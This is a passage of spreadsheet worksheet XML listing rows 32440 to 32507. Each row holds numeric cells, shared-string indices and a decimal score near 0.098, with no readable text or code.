        <v>3182.0</v>
      </c>
      <c r="B32440" s="2">
        <v>3.7111941E7</v>
      </c>
      <c r="C32440" s="2" t="s">
        <v>31217</v>
      </c>
      <c r="D32440" s="2">
        <v>1.0</v>
      </c>
      <c r="E32440" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32440" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32441" ht="15.75" customHeight="1">
      <c r="A32441" s="1">
        <v>3400.0</v>
      </c>
      <c r="B32441" s="2">
        <v>3.802833E7</v>
      </c>
      <c r="C32441" s="2" t="s">
        <v>31218</v>
      </c>
      <c r="D32441" s="2">
        <v>1.0</v>
      </c>
      <c r="E32441" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32441" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32442" ht="15.75" customHeight="1">
      <c r="A32442" s="1">
        <v>5900.0</v>
      </c>
      <c r="B32442" s="2">
        <v>4.7181088E7</v>
      </c>
      <c r="C32442" s="2" t="s">
        <v>31219</v>
      </c>
      <c r="D32442" s="2">
        <v>1.0</v>
      </c>
      <c r="E32442" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32442" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32443" ht="15.75" customHeight="1">
      <c r="A32443" s="1">
        <v>9753.0</v>
      </c>
      <c r="B32443" s="2">
        <v>5.6490156E7</v>
      </c>
      <c r="C32443" s="2" t="s">
        <v>30705</v>
      </c>
      <c r="D32443" s="2">
        <v>1.0</v>
      </c>
      <c r="E32443" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32443" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32444" ht="15.75" customHeight="1">
      <c r="A32444" s="1">
        <v>10576.0</v>
      </c>
      <c r="B32444" s="2">
        <v>1.3015985E7</v>
      </c>
      <c r="C32444" s="2" t="s">
        <v>31220</v>
      </c>
      <c r="D32444" s="2">
        <v>1.0</v>
      </c>
      <c r="E32444" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32444" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32445" ht="15.75" customHeight="1">
      <c r="A32445" s="1">
        <v>11900.0</v>
      </c>
      <c r="B32445" s="2">
        <v>2.5185348E7</v>
      </c>
      <c r="C32445" s="2" t="s">
        <v>31221</v>
      </c>
      <c r="D32445" s="2">
        <v>1.0</v>
      </c>
      <c r="E32445" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32445" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32446" ht="15.75" customHeight="1">
      <c r="A32446" s="1">
        <v>13007.0</v>
      </c>
      <c r="B32446" s="2">
        <v>3.2822745E7</v>
      </c>
      <c r="C32446" s="2" t="s">
        <v>31222</v>
      </c>
      <c r="D32446" s="2">
        <v>1.0</v>
      </c>
      <c r="E32446" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32446" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32447" ht="15.75" customHeight="1">
      <c r="A32447" s="1">
        <v>13240.0</v>
      </c>
      <c r="B32447" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C32447" s="2" t="s">
        <v>31223</v>
      </c>
      <c r="D32447" s="2">
        <v>1.0</v>
      </c>
      <c r="E32447" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32447" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32448" ht="15.75" customHeight="1">
      <c r="A32448" s="1">
        <v>19436.0</v>
      </c>
      <c r="B32448" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C32448" s="2" t="s">
        <v>31224</v>
      </c>
      <c r="D32448" s="2">
        <v>1.0</v>
      </c>
      <c r="E32448" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32448" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32449" ht="15.75" customHeight="1">
      <c r="A32449" s="1">
        <v>21363.0</v>
      </c>
      <c r="B32449" s="2">
        <v>2.1459318E7</v>
      </c>
      <c r="C32449" s="2" t="s">
        <v>31225</v>
      </c>
      <c r="D32449" s="2">
        <v>1.0</v>
      </c>
      <c r="E32449" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32449" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="32450" ht="15.75" customHeight="1">
      <c r="A32450" s="1">
        <v>31654.0</v>
      </c>
      <c r="B32450" s="2">
        <v>5.164524E7</v>
      </c>
      <c r="C32450" s="2" t="s">
        <v>31226</v>
      </c>
      <c r="D32450" s="2">
        <v>1.0</v>
      </c>
      <c r="E32450" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32450" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="32451" ht="15.75" customHeight="1">
      <c r="A32451" s="1">
        <v>17938.0</v>
      </c>
      <c r="B32451" s="2">
        <v>5.1247985E7</v>
      </c>
      <c r="C32451" s="2" t="s">
        <v>31227</v>
      </c>
      <c r="D32451" s="2">
        <v>1.0</v>
      </c>
      <c r="E32451" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32451" s="2">
        <v>0.09887005649717512</v>
      </c>
    </row>
    <row r="32452" ht="15.75" customHeight="1">
      <c r="A32452" s="1">
        <v>2353.0</v>
      </c>
      <c r="B32452" s="2">
        <v>3.3090669E7</v>
      </c>
      <c r="C32452" s="2" t="s">
        <v>31228</v>
      </c>
      <c r="D32452" s="2">
        <v>1.0</v>
      </c>
      <c r="E32452" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32452" s="2">
        <v>0.09844054580896687</v>
      </c>
    </row>
    <row r="32453" ht="15.75" customHeight="1">
      <c r="A32453" s="1">
        <v>20466.0</v>
      </c>
      <c r="B32453" s="2">
        <v>1.2741585E7</v>
      </c>
      <c r="C32453" s="2" t="s">
        <v>31229</v>
      </c>
      <c r="D32453" s="2">
        <v>1.0</v>
      </c>
      <c r="E32453" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32453" s="2">
        <v>0.09844054580896686</v>
      </c>
    </row>
    <row r="32454" ht="15.75" customHeight="1">
      <c r="A32454" s="1">
        <v>12551.0</v>
      </c>
      <c r="B32454" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C32454" s="2" t="s">
        <v>31230</v>
      </c>
      <c r="D32454" s="2">
        <v>1.0</v>
      </c>
      <c r="E32454" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32454" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="32455" ht="15.75" customHeight="1">
      <c r="A32455" s="1">
        <v>15209.0</v>
      </c>
      <c r="B32455" s="2">
        <v>4.2134667E7</v>
      </c>
      <c r="C32455" s="2" t="s">
        <v>31231</v>
      </c>
      <c r="D32455" s="2">
        <v>1.0</v>
      </c>
      <c r="E32455" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32455" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="32456" ht="15.75" customHeight="1">
      <c r="A32456" s="1">
        <v>33467.0</v>
      </c>
      <c r="B32456" s="2">
        <v>7958655.0</v>
      </c>
      <c r="C32456" s="2" t="s">
        <v>31232</v>
      </c>
      <c r="D32456" s="2">
        <v>1.0</v>
      </c>
      <c r="E32456" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32456" s="2">
        <v>0.09821428571428573</v>
      </c>
    </row>
    <row r="32457" ht="15.75" customHeight="1">
      <c r="A32457" s="1">
        <v>7804.0</v>
      </c>
      <c r="B32457" s="2">
        <v>5.2226818E7</v>
      </c>
      <c r="C32457" s="2" t="s">
        <v>31233</v>
      </c>
      <c r="D32457" s="2">
        <v>1.0</v>
      </c>
      <c r="E32457" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32457" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="32458" ht="15.75" customHeight="1">
      <c r="A32458" s="1">
        <v>32083.0</v>
      </c>
      <c r="B32458" s="2">
        <v>5387912.0</v>
      </c>
      <c r="C32458" s="2" t="s">
        <v>31234</v>
      </c>
      <c r="D32458" s="2">
        <v>1.0</v>
      </c>
      <c r="E32458" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32458" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="32459" ht="15.75" customHeight="1">
      <c r="A32459" s="1">
        <v>1290.0</v>
      </c>
      <c r="B32459" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C32459" s="2" t="s">
        <v>31235</v>
      </c>
      <c r="D32459" s="2">
        <v>1.0</v>
      </c>
      <c r="E32459" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32459" s="2">
        <v>0.09821428571428568</v>
      </c>
    </row>
    <row r="32460" ht="15.75" customHeight="1">
      <c r="A32460" s="1">
        <v>4995.0</v>
      </c>
      <c r="B32460" s="2">
        <v>4.4170783E7</v>
      </c>
      <c r="C32460" s="2" t="s">
        <v>31236</v>
      </c>
      <c r="D32460" s="2">
        <v>1.0</v>
      </c>
      <c r="E32460" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32460" s="2">
        <v>0.09821428571428568</v>
      </c>
    </row>
    <row r="32461" ht="15.75" customHeight="1">
      <c r="A32461" s="1">
        <v>1341.0</v>
      </c>
      <c r="B32461" s="2">
        <v>2.5864806E7</v>
      </c>
      <c r="C32461" s="2" t="s">
        <v>31237</v>
      </c>
      <c r="D32461" s="2">
        <v>1.0</v>
      </c>
      <c r="E32461" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32461" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="32462" ht="15.75" customHeight="1">
      <c r="A32462" s="1">
        <v>13631.0</v>
      </c>
      <c r="B32462" s="2">
        <v>3.5888093E7</v>
      </c>
      <c r="C32462" s="2" t="s">
        <v>31238</v>
      </c>
      <c r="D32462" s="2">
        <v>1.0</v>
      </c>
      <c r="E32462" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32462" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="32463" ht="15.75" customHeight="1">
      <c r="A32463" s="1">
        <v>31074.0</v>
      </c>
      <c r="B32463" s="2">
        <v>4830429.0</v>
      </c>
      <c r="C32463" s="2" t="s">
        <v>31239</v>
      </c>
      <c r="D32463" s="2">
        <v>1.0</v>
      </c>
      <c r="E32463" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32463" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="32464" ht="15.75" customHeight="1">
      <c r="A32464" s="1">
        <v>9698.0</v>
      </c>
      <c r="B32464" s="2">
        <v>5.6367707E7</v>
      </c>
      <c r="C32464" s="2" t="s">
        <v>31240</v>
      </c>
      <c r="D32464" s="2">
        <v>1.0</v>
      </c>
      <c r="E32464" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32464" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="32465" ht="15.75" customHeight="1">
      <c r="A32465" s="1">
        <v>25909.0</v>
      </c>
      <c r="B32465" s="2">
        <v>1.506872E7</v>
      </c>
      <c r="C32465" s="2" t="s">
        <v>31241</v>
      </c>
      <c r="D32465" s="2">
        <v>1.0</v>
      </c>
      <c r="E32465" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32465" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="32466" ht="15.75" customHeight="1">
      <c r="A32466" s="1">
        <v>1640.0</v>
      </c>
      <c r="B32466" s="2">
        <v>2.8031274E7</v>
      </c>
      <c r="C32466" s="2" t="s">
        <v>31242</v>
      </c>
      <c r="D32466" s="2">
        <v>1.0</v>
      </c>
      <c r="E32466" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32466" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32467" ht="15.75" customHeight="1">
      <c r="A32467" s="1">
        <v>2499.0</v>
      </c>
      <c r="B32467" s="2">
        <v>3.3936258E7</v>
      </c>
      <c r="C32467" s="2" t="s">
        <v>31243</v>
      </c>
      <c r="D32467" s="2">
        <v>1.0</v>
      </c>
      <c r="E32467" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32467" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32468" ht="15.75" customHeight="1">
      <c r="A32468" s="1">
        <v>4927.0</v>
      </c>
      <c r="B32468" s="2">
        <v>4.3984522E7</v>
      </c>
      <c r="C32468" s="2" t="s">
        <v>31244</v>
      </c>
      <c r="D32468" s="2">
        <v>1.0</v>
      </c>
      <c r="E32468" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32468" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32469" ht="15.75" customHeight="1">
      <c r="A32469" s="1">
        <v>6155.0</v>
      </c>
      <c r="B32469" s="2">
        <v>4.7856943E7</v>
      </c>
      <c r="C32469" s="2" t="s">
        <v>31245</v>
      </c>
      <c r="D32469" s="2">
        <v>1.0</v>
      </c>
      <c r="E32469" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32469" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32470" ht="15.75" customHeight="1">
      <c r="A32470" s="1">
        <v>8631.0</v>
      </c>
      <c r="B32470" s="2">
        <v>5.4317148E7</v>
      </c>
      <c r="C32470" s="2" t="s">
        <v>31246</v>
      </c>
      <c r="D32470" s="2">
        <v>1.0</v>
      </c>
      <c r="E32470" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32470" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32471" ht="15.75" customHeight="1">
      <c r="A32471" s="1">
        <v>9033.0</v>
      </c>
      <c r="B32471" s="2">
        <v>5.5042958E7</v>
      </c>
      <c r="C32471" s="2" t="s">
        <v>31247</v>
      </c>
      <c r="D32471" s="2">
        <v>1.0</v>
      </c>
      <c r="E32471" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32471" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32472" ht="15.75" customHeight="1">
      <c r="A32472" s="1">
        <v>10374.0</v>
      </c>
      <c r="B32472" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C32472" s="2" t="s">
        <v>31248</v>
      </c>
      <c r="D32472" s="2">
        <v>1.0</v>
      </c>
      <c r="E32472" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32472" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32473" ht="15.75" customHeight="1">
      <c r="A32473" s="1">
        <v>16042.0</v>
      </c>
      <c r="B32473" s="2">
        <v>4.5143545E7</v>
      </c>
      <c r="C32473" s="2" t="s">
        <v>31249</v>
      </c>
      <c r="D32473" s="2">
        <v>1.0</v>
      </c>
      <c r="E32473" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32473" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32474" ht="15.75" customHeight="1">
      <c r="A32474" s="1">
        <v>21797.0</v>
      </c>
      <c r="B32474" s="2">
        <v>2.6633145E7</v>
      </c>
      <c r="C32474" s="2" t="s">
        <v>31250</v>
      </c>
      <c r="D32474" s="2">
        <v>1.0</v>
      </c>
      <c r="E32474" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32474" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32475" ht="15.75" customHeight="1">
      <c r="A32475" s="1">
        <v>23452.0</v>
      </c>
      <c r="B32475" s="2">
        <v>5.6871664E7</v>
      </c>
      <c r="C32475" s="2" t="s">
        <v>31251</v>
      </c>
      <c r="D32475" s="2">
        <v>1.0</v>
      </c>
      <c r="E32475" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32475" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="32476" ht="15.75" customHeight="1">
      <c r="A32476" s="1">
        <v>12887.0</v>
      </c>
      <c r="B32476" s="2">
        <v>3.2023406E7</v>
      </c>
      <c r="C32476" s="2" t="s">
        <v>31252</v>
      </c>
      <c r="D32476" s="2">
        <v>1.0</v>
      </c>
      <c r="E32476" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32476" s="2">
        <v>0.09797979797979793</v>
      </c>
    </row>
    <row r="32477" ht="15.75" customHeight="1">
      <c r="A32477" s="1">
        <v>26937.0</v>
      </c>
      <c r="B32477" s="2">
        <v>1.9526264E7</v>
      </c>
      <c r="C32477" s="2" t="s">
        <v>31253</v>
      </c>
      <c r="D32477" s="2">
        <v>1.0</v>
      </c>
      <c r="E32477" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32477" s="2">
        <v>0.09788359788359788</v>
      </c>
    </row>
    <row r="32478" ht="15.75" customHeight="1">
      <c r="A32478" s="1">
        <v>93.0</v>
      </c>
      <c r="B32478" s="2">
        <v>1.213386E7</v>
      </c>
      <c r="C32478" s="2" t="s">
        <v>31254</v>
      </c>
      <c r="D32478" s="2">
        <v>1.0</v>
      </c>
      <c r="E32478" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32478" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="32479" ht="15.75" customHeight="1">
      <c r="A32479" s="1">
        <v>3037.0</v>
      </c>
      <c r="B32479" s="2">
        <v>3.6483618E7</v>
      </c>
      <c r="C32479" s="2" t="s">
        <v>31255</v>
      </c>
      <c r="D32479" s="2">
        <v>1.0</v>
      </c>
      <c r="E32479" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32479" s="2">
        <v>0.09773662551440329</v>
      </c>
    </row>
    <row r="32480" ht="15.75" customHeight="1">
      <c r="A32480" s="1">
        <v>342.0</v>
      </c>
      <c r="B32480" s="2">
        <v>1.5906885E7</v>
      </c>
      <c r="C32480" s="2" t="s">
        <v>31256</v>
      </c>
      <c r="D32480" s="2">
        <v>1.0</v>
      </c>
      <c r="E32480" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32480" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32481" ht="15.75" customHeight="1">
      <c r="A32481" s="1">
        <v>2020.0</v>
      </c>
      <c r="B32481" s="2">
        <v>3.0741214E7</v>
      </c>
      <c r="C32481" s="2" t="s">
        <v>31257</v>
      </c>
      <c r="D32481" s="2">
        <v>1.0</v>
      </c>
      <c r="E32481" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32481" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32482" ht="15.75" customHeight="1">
      <c r="A32482" s="1">
        <v>5249.0</v>
      </c>
      <c r="B32482" s="2">
        <v>4.507331E7</v>
      </c>
      <c r="C32482" s="2" t="s">
        <v>31258</v>
      </c>
      <c r="D32482" s="2">
        <v>1.0</v>
      </c>
      <c r="E32482" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32482" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32483" ht="15.75" customHeight="1">
      <c r="A32483" s="1">
        <v>5582.0</v>
      </c>
      <c r="B32483" s="2">
        <v>4.6059802E7</v>
      </c>
      <c r="C32483" s="2" t="s">
        <v>31259</v>
      </c>
      <c r="D32483" s="2">
        <v>1.0</v>
      </c>
      <c r="E32483" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32483" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32484" ht="15.75" customHeight="1">
      <c r="A32484" s="1">
        <v>9790.0</v>
      </c>
      <c r="B32484" s="2">
        <v>5.6526549E7</v>
      </c>
      <c r="C32484" s="2" t="s">
        <v>31260</v>
      </c>
      <c r="D32484" s="2">
        <v>1.0</v>
      </c>
      <c r="E32484" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32484" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32485" ht="15.75" customHeight="1">
      <c r="A32485" s="1">
        <v>11853.0</v>
      </c>
      <c r="B32485" s="2">
        <v>2.4809002E7</v>
      </c>
      <c r="C32485" s="2" t="s">
        <v>31261</v>
      </c>
      <c r="D32485" s="2">
        <v>1.0</v>
      </c>
      <c r="E32485" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32485" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32486" ht="15.75" customHeight="1">
      <c r="A32486" s="1">
        <v>13381.0</v>
      </c>
      <c r="B32486" s="2">
        <v>3.4885639E7</v>
      </c>
      <c r="C32486" s="2" t="s">
        <v>31262</v>
      </c>
      <c r="D32486" s="2">
        <v>1.0</v>
      </c>
      <c r="E32486" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32486" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32487" ht="15.75" customHeight="1">
      <c r="A32487" s="1">
        <v>14544.0</v>
      </c>
      <c r="B32487" s="2">
        <v>3.9928486E7</v>
      </c>
      <c r="C32487" s="2" t="s">
        <v>31263</v>
      </c>
      <c r="D32487" s="2">
        <v>1.0</v>
      </c>
      <c r="E32487" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32487" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32488" ht="15.75" customHeight="1">
      <c r="A32488" s="1">
        <v>14698.0</v>
      </c>
      <c r="B32488" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C32488" s="2" t="s">
        <v>31264</v>
      </c>
      <c r="D32488" s="2">
        <v>1.0</v>
      </c>
      <c r="E32488" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32488" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32489" ht="15.75" customHeight="1">
      <c r="A32489" s="1">
        <v>18929.0</v>
      </c>
      <c r="B32489" s="2">
        <v>5.4255332E7</v>
      </c>
      <c r="C32489" s="2" t="s">
        <v>31265</v>
      </c>
      <c r="D32489" s="2">
        <v>1.0</v>
      </c>
      <c r="E32489" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32489" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32490" ht="15.75" customHeight="1">
      <c r="A32490" s="1">
        <v>24265.0</v>
      </c>
      <c r="B32490" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C32490" s="2" t="s">
        <v>31266</v>
      </c>
      <c r="D32490" s="2">
        <v>1.0</v>
      </c>
      <c r="E32490" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32490" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32491" ht="15.75" customHeight="1">
      <c r="A32491" s="1">
        <v>24593.0</v>
      </c>
      <c r="B32491" s="2">
        <v>1.1385989E7</v>
      </c>
      <c r="C32491" s="2" t="s">
        <v>31267</v>
      </c>
      <c r="D32491" s="2">
        <v>1.0</v>
      </c>
      <c r="E32491" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32491" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32492" ht="15.75" customHeight="1">
      <c r="A32492" s="1">
        <v>26319.0</v>
      </c>
      <c r="B32492" s="2">
        <v>1.6663825E7</v>
      </c>
      <c r="C32492" s="2" t="s">
        <v>31268</v>
      </c>
      <c r="D32492" s="2">
        <v>1.0</v>
      </c>
      <c r="E32492" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32492" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="32493" ht="15.75" customHeight="1">
      <c r="A32493" s="1">
        <v>9776.0</v>
      </c>
      <c r="B32493" s="2">
        <v>5.6506632E7</v>
      </c>
      <c r="C32493" s="2" t="s">
        <v>31269</v>
      </c>
      <c r="D32493" s="2">
        <v>1.0</v>
      </c>
      <c r="E32493" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32493" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="32494" ht="15.75" customHeight="1">
      <c r="A32494" s="1">
        <v>11629.0</v>
      </c>
      <c r="B32494" s="2">
        <v>2.3165502E7</v>
      </c>
      <c r="C32494" s="2" t="s">
        <v>31270</v>
      </c>
      <c r="D32494" s="2">
        <v>1.0</v>
      </c>
      <c r="E32494" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32494" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="32495" ht="15.75" customHeight="1">
      <c r="A32495" s="1">
        <v>17131.0</v>
      </c>
      <c r="B32495" s="2">
        <v>4.8828195E7</v>
      </c>
      <c r="C32495" s="2" t="s">
        <v>31271</v>
      </c>
      <c r="D32495" s="2">
        <v>1.0</v>
      </c>
      <c r="E32495" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32495" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="32496" ht="15.75" customHeight="1">
      <c r="A32496" s="1">
        <v>23130.0</v>
      </c>
      <c r="B32496" s="2">
        <v>5.1407727E7</v>
      </c>
      <c r="C32496" s="2" t="s">
        <v>30807</v>
      </c>
      <c r="D32496" s="2">
        <v>1.0</v>
      </c>
      <c r="E32496" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32496" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="32497" ht="15.75" customHeight="1">
      <c r="A32497" s="1">
        <v>11601.0</v>
      </c>
      <c r="B32497" s="2">
        <v>2.2960006E7</v>
      </c>
      <c r="C32497" s="2" t="s">
        <v>31272</v>
      </c>
      <c r="D32497" s="2">
        <v>1.0</v>
      </c>
      <c r="E32497" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32497" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32498" ht="15.75" customHeight="1">
      <c r="A32498" s="1">
        <v>11703.0</v>
      </c>
      <c r="B32498" s="2">
        <v>2.3530711E7</v>
      </c>
      <c r="C32498" s="2" t="s">
        <v>31273</v>
      </c>
      <c r="D32498" s="2">
        <v>1.0</v>
      </c>
      <c r="E32498" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32498" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32499" ht="15.75" customHeight="1">
      <c r="A32499" s="1">
        <v>12357.0</v>
      </c>
      <c r="B32499" s="2">
        <v>2.8692584E7</v>
      </c>
      <c r="C32499" s="2" t="s">
        <v>31274</v>
      </c>
      <c r="D32499" s="2">
        <v>1.0</v>
      </c>
      <c r="E32499" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32499" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32500" ht="15.75" customHeight="1">
      <c r="A32500" s="1">
        <v>15212.0</v>
      </c>
      <c r="B32500" s="2">
        <v>4.2144882E7</v>
      </c>
      <c r="C32500" s="2" t="s">
        <v>31275</v>
      </c>
      <c r="D32500" s="2">
        <v>1.0</v>
      </c>
      <c r="E32500" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32500" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32501" ht="15.75" customHeight="1">
      <c r="A32501" s="1">
        <v>20536.0</v>
      </c>
      <c r="B32501" s="2">
        <v>1.3263056E7</v>
      </c>
      <c r="C32501" s="2" t="s">
        <v>30605</v>
      </c>
      <c r="D32501" s="2">
        <v>1.0</v>
      </c>
      <c r="E32501" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32501" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32502" ht="15.75" customHeight="1">
      <c r="A32502" s="1">
        <v>20876.0</v>
      </c>
      <c r="B32502" s="2">
        <v>1.6027584E7</v>
      </c>
      <c r="C32502" s="2" t="s">
        <v>31276</v>
      </c>
      <c r="D32502" s="2">
        <v>1.0</v>
      </c>
      <c r="E32502" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32502" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="32503" ht="15.75" customHeight="1">
      <c r="A32503" s="1">
        <v>219.0</v>
      </c>
      <c r="B32503" s="2">
        <v>1.4617241E7</v>
      </c>
      <c r="C32503" s="2" t="s">
        <v>31277</v>
      </c>
      <c r="D32503" s="2">
        <v>1.0</v>
      </c>
      <c r="E32503" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32503" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32504" ht="15.75" customHeight="1">
      <c r="A32504" s="1">
        <v>887.0</v>
      </c>
      <c r="B32504" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C32504" s="2" t="s">
        <v>31278</v>
      </c>
      <c r="D32504" s="2">
        <v>1.0</v>
      </c>
      <c r="E32504" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32504" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32505" ht="15.75" customHeight="1">
      <c r="A32505" s="1">
        <v>1103.0</v>
      </c>
      <c r="B32505" s="2">
        <v>2.3990883E7</v>
      </c>
      <c r="C32505" s="2" t="s">
        <v>31279</v>
      </c>
      <c r="D32505" s="2">
        <v>1.0</v>
      </c>
      <c r="E32505" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32505" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32506" ht="15.75" customHeight="1">
      <c r="A32506" s="1">
        <v>1148.0</v>
      </c>
      <c r="B32506" s="2">
        <v>2.4352915E7</v>
      </c>
      <c r="C32506" s="2" t="s">
        <v>31280</v>
      </c>
      <c r="D32506" s="2">
        <v>1.0</v>
      </c>
      <c r="E32506" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32506" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32507" ht="15.75" customHeight="1">
      <c r="A32507" s="1">
